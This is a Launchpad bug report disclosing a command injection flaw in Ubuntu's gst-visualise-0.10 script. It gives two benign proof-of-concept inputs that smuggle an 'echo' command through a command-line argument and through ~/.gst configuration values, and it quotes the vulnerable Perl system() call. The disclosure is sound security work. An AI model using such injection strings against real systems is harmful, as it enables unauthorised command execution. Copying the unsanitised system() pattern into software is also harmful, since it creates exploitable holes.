Ubuntu
gst-plugins-base0.10 package

command injection in gst-visualise-0.10

Bug #782466 reported by Emanuel Bronshtein
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
gst-plugins-base0.10 (Ubuntu)
New
Undecided
Unassigned

Bug Description

Binary package hint: gstreamer0.10-plugins-base-apps

/usr/bin/gst-visualise-0.10 have command injection bug .

test case :
1) from first argument ($pipe variable):
emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10 "text 2>/dev/null ; echo Systeminj ; #"
No configuration file /home/emanuel/.gst found. You might want to create one.
Running gst-launch-0.10 osssrc ! text 2>/dev/null ; echo Systeminj ; # ! { queue ! ffmpegcolorspace ! xvimagesink }
Systeminj

2) from ~/.gst file :
emanuel@emanuel-desktop:/tmp$ cat ~/.gst
AUDIOSRC=test;echo Systeminj;exit;
VIDEOSINK=test;echo Systeminj;exit;
CVS_PATH=test;echo Systeminj;exit;

emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10
Running gst-launch-0.10 test;echo Systeminj;exit; ! goom ! { queue ! ffmpegcolorspace ! test;echo Systeminj;exit; }
Systeminj

the bug can be found at :

    $command = "gst-launch-0.10 $cfg{AUDIOSRC} ! $pipe ! { queue ! ffmpegcolorspace ! $cfg{VIDEOSINK} }";
    print "Running $command\n";
    system ("PATH=\$PATH:".$cfg{CVS_PATH}."/gstreamer/tools $command");

To post a comment you must log in.
This report contains Public information  
Everyone can see this information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.